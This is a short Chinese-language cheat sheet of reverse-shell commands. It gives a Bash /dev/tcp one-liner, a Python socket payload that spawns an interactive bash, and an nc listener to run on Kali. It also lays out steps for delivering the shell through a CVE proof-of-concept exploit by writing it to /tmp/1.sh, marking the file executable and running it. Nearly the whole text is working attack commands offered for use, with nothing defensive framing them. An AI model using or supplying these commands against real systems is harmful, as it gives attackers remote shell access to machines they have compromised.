在某些情况下可能需要我们反弹一个shell来更好的执行某些命令。就可以用到这些命令:
Bash反弹shell命令如下:
bash -i >& /dev/tcp/ip/port 0>&1
使用python反弹,反弹shell命令如下:
python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
首先,使用nc在kali上监听端口:
nc -lvvp 7777
2021-11-10新增写文件反弹shell
反弹shell: (xxxx xxx xxx 代表运行POC的一些命令 然后 -c 后面是执行命令的地方)
xxxxxxx xxx xx -c "echo 'bash -i >& /dev/tcp/ip/port 0>&1' > /tmp/1.sh" 这条语句意思是代表,将反弹shell命令写成sh脚本 到tmp目录下
xxxx xxxx xxxx -c "chmod +x /tmp/1.sh" 这条语句意思是代表,对写入成功的sh脚本加执行权限 CVE-2021-2205.py xxx xxx xxxx xxxxxx -c "/bin/bash /tmp/1.sh" 这条语句意思是代表,运行反弹shell脚本
